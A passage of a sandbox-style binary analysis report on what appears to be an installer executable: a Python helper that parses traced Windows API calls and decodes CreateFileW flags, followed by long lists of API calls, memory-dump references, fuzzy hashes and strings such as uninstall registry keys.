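# "<api>.<module>(<args>), ref: <addr>"; the argument list is absent for LIBCMT
# entries such as "_malloc.LIBCMT ref: 0044AC54".
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

Arg = Union[int, str, None]  # hex value, literal string, or None for "?" (unknown to the tracer)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]
    ref: int  # virtual address of the call site


def parse_arg(token: str) -> Arg:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)  # "-00000004" -> -4; a bare "F" would also parse as 15
    except ValueError:
        return token  # string argument such as "kernel32" or "PackageCode"


def parse_api_line(line: str) -> ApiCall:
    m = LINE_RE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))


# Standard Win32 values for the CreateFileW parameters that matter in triage.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL",
         0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def flag_names(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)  # bits the table does not know
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) or "0"


def decode_createfile(call: ApiCall) -> dict:
    # CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    #             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile).
    # The tracer prints further stack slots after the 7 real arguments; they are ignored.
    if call.api != "CreateFileW" or len(call.args) < 7:
        raise ValueError("not a complete CreateFileW call")
    access, share, disp, attrs = call.args[1], call.args[2], call.args[4], call.args[5]
    if not all(isinstance(x, int) for x in (access, share, disp, attrs)):
        raise ValueError("CreateFileW flags not resolved by the tracer")
    return {
        "access": flag_names(access, GENERIC),
        "share": flag_names(share, SHARE),
        "disposition": DISPOSITION.get(disp, hex(disp)),
        "attributes": flag_names(attrs, ATTRS),
    }


def is_file_drop(calls: List[ApiCall]) -> bool:
    """Triage heuristic (assumed here, not a report field): CreateFileW opened for
    writing with a create/truncate disposition, followed by WriteFile in the same function."""
    for i, c in enumerate(calls):
        if c.api != "CreateFileW":
            continue
        try:
            d = decode_createfile(c)
        except ValueError:
            continue
        writes = "GENERIC_WRITE" in d["access"] or "GENERIC_ALL" in d["access"]
        creates = d["disposition"] in ("CREATE_NEW", "CREATE_ALWAYS", "TRUNCATE_EXISTING")
        if writes and creates and any(x.api == "WriteFile" for x in calls[i + 1:]):
            return True
    return False


if __name__ == "__main__":
    calls = [parse_api_line(l) for l in REPORT_LINES]
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.api}")
    print(decode_createfile(calls[0]))
    print("file drop:", is_file_drop(calls))
```

Run against the three lines above, the decoder reports GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL at call site 0040668C, i.e. an unconditional overwrite of whatever path is passed in, followed by a write and a flush. The path itself is "?" in the report (not resolved statically), so which file is dropped has to come from the dynamic file-activity section, not from this listing.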

APIs
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: a03886ae4c016c619efcf61442cbf10ecaf0cd446ba12783cd027aba8e8b3cf8
• Instruction ID: 6ad914f56b5651514767e750a3ed003d132d937937be266610b9d4167089d4bd
• Opcode Fuzzy Hash: a03886ae4c016c619efcf61442cbf10ecaf0cd446ba12783cd027aba8e8b3cf8
• Instruction Fuzzy Hash: 18410371600202BBDF288F55C881A6BB7B5EF05309F20486FE986D6242F779CA51CF5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• CharNextW.USER32(?,?,00000000,?,?,?,?,0043131F,?,CC858012,?,?,?,?,?,0046C010), ref: 00431CBC
• CharNextW.USER32(?,?,?,00000000,?,?,?,?,0043131F,?,CC858012), ref: 00431D42
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext
• String ID:
• API String ID: 3213498283-0
• Opcode ID: 212b0eca02ec0c66911f91164816a4ac6bd761ace310a780f80bf75a699cd8d9
• Instruction ID: 9b8d605a96f13887df97026cbe200648c5acf8bd3d962a38117b3a13dcfaf1af
• Opcode Fuzzy Hash: 212b0eca02ec0c66911f91164816a4ac6bd761ace310a780f80bf75a699cd8d9
• Instruction Fuzzy Hash: 17419D35A00306DFDB209F68C58456AB7F6FF5D305B64652EE8868B320E778AD81CB58
Uniqueness
Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 0044AC54
  • Part of subcall function 00444C09: HeapAlloc.KERNEL32(?,00000000,00000001,00000001,00000000,00000000,?,00444841,00000001,00000000,00000000,?,?,0044476A,0044143B,?), ref: 00444C4C
• _free.LIBCMT ref: 0044AC67
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap_free_malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2734353464-0
                                                                                                                                                                          • Opcode ID: e160bcc4c3d0cacebbcfc193296d9aae3087e556d6632f274c7e73ba45a0799d
                                                                                                                                                                          • Instruction ID: b9f73bd8a450b3cffc78f08d8f9f6c8e0b5f46b46bec20b455bb2fed55eb05ca
                                                                                                                                                                          • Opcode Fuzzy Hash: e160bcc4c3d0cacebbcfc193296d9aae3087e556d6632f274c7e73ba45a0799d
                                                                                                                                                                          • Instruction Fuzzy Hash: F4112C31844612AFFBA13F71FD8575A3BA4AF00365B11043FF94C96251DF3D8865869E
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B40
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B4E
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00430B58
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430B77
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00430BA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CountTick
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 404621862-0
                                                                                                                                                                          • Opcode ID: e8da3cf06002def57b1f4ce7d931ce009ca4e36d52db2329bc4f0be1d6ba951f
                                                                                                                                                                          • Instruction ID: 06efedcd22a505bdc26b10d37abf8f8e9656904f8cd6eb81644b0ae740f742f1
                                                                                                                                                                          • Opcode Fuzzy Hash: e8da3cf06002def57b1f4ce7d931ce009ca4e36d52db2329bc4f0be1d6ba951f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F216A71200704AFEB209F65DC81B27B7BAEB84714F104A1EB9428B2A0C735F811CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$CharNext_wcsrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2742890867-0
                                                                                                                                                                          • Opcode ID: ecef3fdfa5252b436cdd23ab3db622d8ec42d8064175b364ba003cd72f3ccda5
                                                                                                                                                                          • Instruction ID: 427e9a2e117e67f9933e0f07d9ac3128e7f4676c6faddd57416c4f280addbdb5
                                                                                                                                                                          • Opcode Fuzzy Hash: ecef3fdfa5252b436cdd23ab3db622d8ec42d8064175b364ba003cd72f3ccda5
                                                                                                                                                                          • Instruction Fuzzy Hash: 19115E329006189BD761EFA4DD40AAFB7F8FF49710F0191AAA548D7250DE349D888B98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,?,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B814
                                                                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B826
                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B839
                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?), ref: 0040B857
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,0040B89B,00000000,?,?,0043DE5E,?,00000000,?), ref: 0040B85E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$View$CloseCreateHandleMappingSizeUnmap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1558290345-0
                                                                                                                                                                          • Opcode ID: 650e9dba2e0a3434825c1aba41107afbdcd6a86aa70516db5dffe116626a669c
                                                                                                                                                                          • Instruction ID: 86cc450e030aa79249887fec2a4adf2032cafc84a784672eda3a3bcbbc45f06e
                                                                                                                                                                          • Opcode Fuzzy Hash: 650e9dba2e0a3434825c1aba41107afbdcd6a86aa70516db5dffe116626a669c
                                                                                                                                                                          • Instruction Fuzzy Hash: 30F0C232101224BBDB311BA69C4CD9B7E6DDF466F0B014134FA0D92221D7318800CBE8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00440B05
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00008001,0000000A), ref: 00440B55
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(0000000A,00000080), ref: 00440B5F
                                                                                                                                                                          • DeleteFileW.KERNEL32(0000000A), ref: 00440B68
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00440B78
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFileH_prolog3Mode$AttributesDeleteH_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2831870221-0
                                                                                                                                                                          • Opcode ID: f18ed2b75a9a08ce323156f476ab805aface5c9a56b1542fa45116d469ac4968
                                                                                                                                                                          • Instruction ID: 700291c2492460f05ad3beb870aa9b289cc3e416742a7cd5fa8e256526ff0f4e
                                                                                                                                                                          • Opcode Fuzzy Hash: f18ed2b75a9a08ce323156f476ab805aface5c9a56b1542fa45116d469ac4968
                                                                                                                                                                          • Instruction Fuzzy Hash: B6012B72A00204A7FF006BB18D0A76E3F65DF44354F008126FE059B1A1CB788A55978D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 004300CF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004300DC
• MulDiv.KERNEL32(?,00000000), ref: 004300E6
• ReleaseDC.USER32 ref: 004300F4
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00430112
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CapsCreateDeviceFontRelease
• String ID:
• API String ID: 2367478762-0
• Opcode ID: 73553e230529630540e84881a6acfaad7c4d8eb396e0e781fbc2bf22732756c1
• Instruction ID: d4b79cfdd6cb3a3c4a5459cca3abb9e27aaa89d1bb5ee56165b169b397bf4ef6
• Opcode Fuzzy Hash: 73553e230529630540e84881a6acfaad7c4d8eb396e0e781fbc2bf22732756c1
• Instruction Fuzzy Hash: 0CF07AB2100519BFEB121F61DC09CBF3F6EEB49761B014024FE19C5060C7368D65ABB5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041CB19
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 0041D54A: __EH_prolog3_GS.LIBCMT ref: 0041D551
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 00458F9C: __EH_prolog3_GS.LIBCMT ref: 00458FA3
  • Part of subcall function 00458F9C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000008,00000000,?,0000005C,0041CC00,?,-80000001,?,?), ref: 00459018
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00411344: __EH_prolog3.LIBCMT ref: 0041134B
  • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
  • Part of subcall function 00411D8B: __EH_prolog3_GS.LIBCMT ref: 00411D95
  • Part of subcall function 00411D8B: SysStringLen.OLEAUT32(?), ref: 00411EBB
  • Part of subcall function 00411D8B: SysFreeString.OLEAUT32(?), ref: 00411ECA
Strings
• HsG, xrefs: 0041CC30
• SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0041CBB3
• UninstallString, xrefs: 0041CB9C
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: String$H_prolog3_$ErrorH_prolog3Last$Free$AllocQueryValue
• String ID: HsG$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallString
• API String ID: 1981213432-2364393352
• Opcode ID: 98af843c057a2c20e139c9d9d388cdf564b2207942463d5bd646b59bbe1b7161
• Instruction ID: 75b03b68a6d5dbdf8ba53f7cf621bce4b02718432cfc001af4b0a6a10f5c6841
• Opcode Fuzzy Hash: 98af843c057a2c20e139c9d9d388cdf564b2207942463d5bd646b59bbe1b7161
• Instruction Fuzzy Hash: 7081C230904258EEDB24D7A4CC51BEDBBB4AF15304F1080EEE449B7192DBB85F88DB65
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last
• String ID: HsG$HsG
• API String ID: 1018228973-815662401
• Opcode ID: ee583d198347ccbe1592abd6a1eec0c782ebb70b88abb32cd8d20eb8cbb0be38
• Instruction ID: 33be434c9568f602cbcf9e8dbe85184908a8a27aa8889812b7e340e692e5aa65
• Opcode Fuzzy Hash: ee583d198347ccbe1592abd6a1eec0c782ebb70b88abb32cd8d20eb8cbb0be38
• Instruction Fuzzy Hash: 3C816571800258DEDB15EF64C885BED7BB4BF14304F5440EEEC49AB283DB789A89CB65
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041CDFA
  • Part of subcall function 0041C5BD: RegOpenKeyExW.ADVAPI32(80000001,Software\InstallShield\ISWI\7.0\SetupExeLog,00000000,00000001,?), ref: 0041C5D7
  • Part of subcall function 0041C5BD: RegQueryValueExW.ADVAPI32(?,SetupLogFileName,00000000,00000000,0049F668,?), ref: 0041C5FD
  • Part of subcall function 0041C5BD: RegCloseKey.ADVAPI32(?), ref: 0041C618
  • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
  • Part of subcall function 00433509: __EH_prolog3_GS.LIBCMT ref: 00433513
  • Part of subcall function 00433509: GetModuleFileNameW.KERNEL32(00000000,?,00000400,00483E18,?,00000001), ref: 00433674
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
  • Part of subcall function 0043F694: lstrlenW.KERNEL32(?,?,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 0043F69C
  • Part of subcall function 0043F694: lstrcpynW.KERNEL32(?,?,-00000001,?,0043829B,004A43E0,?,004A4C7C,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8), ref: 0043F6C0
  • Part of subcall function 0043F694: lstrcatW.KERNEL32(?,?), ref: 0043F6DD
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
  • Part of subcall function 0041D880: __EH_prolog3_GS.LIBCMT ref: 0041D88A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorH_prolog3_Last$String$AllocCloseFileH_prolog3ModuleNameOpenQueryValue_malloclstrcatlstrcpynlstrlen
• String ID: /f1$HsG$Setup.iss
• API String ID: 794928986-1143889655
• Opcode ID: 2179c65d335882b8bdbb7f181efda49eda3235c96bf5943a62a695e8d2edfedb
• Instruction ID: 52f2cdaafbab3f4e57d35ee59addb2edc2a2add5d7b7810f9ffae2bf7edaeff5
• Opcode Fuzzy Hash: 2179c65d335882b8bdbb7f181efda49eda3235c96bf5943a62a695e8d2edfedb
• Instruction Fuzzy Hash: AB819370A05348EEDB10EB64CD55BDEBB74AF16308F0040EEE40967691DB789F84CB9A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004119CC
  • Part of subcall function 0042FDE6: __EH_prolog3.LIBCMT ref: 0042FDED
  • Part of subcall function 0042FE5D: GetVersionExW.KERNEL32(?,?,?), ref: 0042FE9A
  • Part of subcall function 0042FE5D: GetSystemInfo.KERNEL32(?,?,?), ref: 0042FEEC
  • Part of subcall function 004382A3: lstrlenW.KERNEL32(?,?,?,00411A37,00000000,00000001,0000044F,00000000,000008A8,0041C4B5,00000452,?,00000218,0041C6E4,?,0000043C), ref: 004382AC
  • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382D3
  • Part of subcall function 004382A3: lstrcpyW.KERNEL32 ref: 004382E1
  • Part of subcall function 004146A1: GetTempPathW.KERNEL32(?,?,00000000,00000000,?,?,00411A59,?,00000400,00000000,00000000,00000001,0000044F,00000000,000008A8,0041C4B5), ref: 004146C1
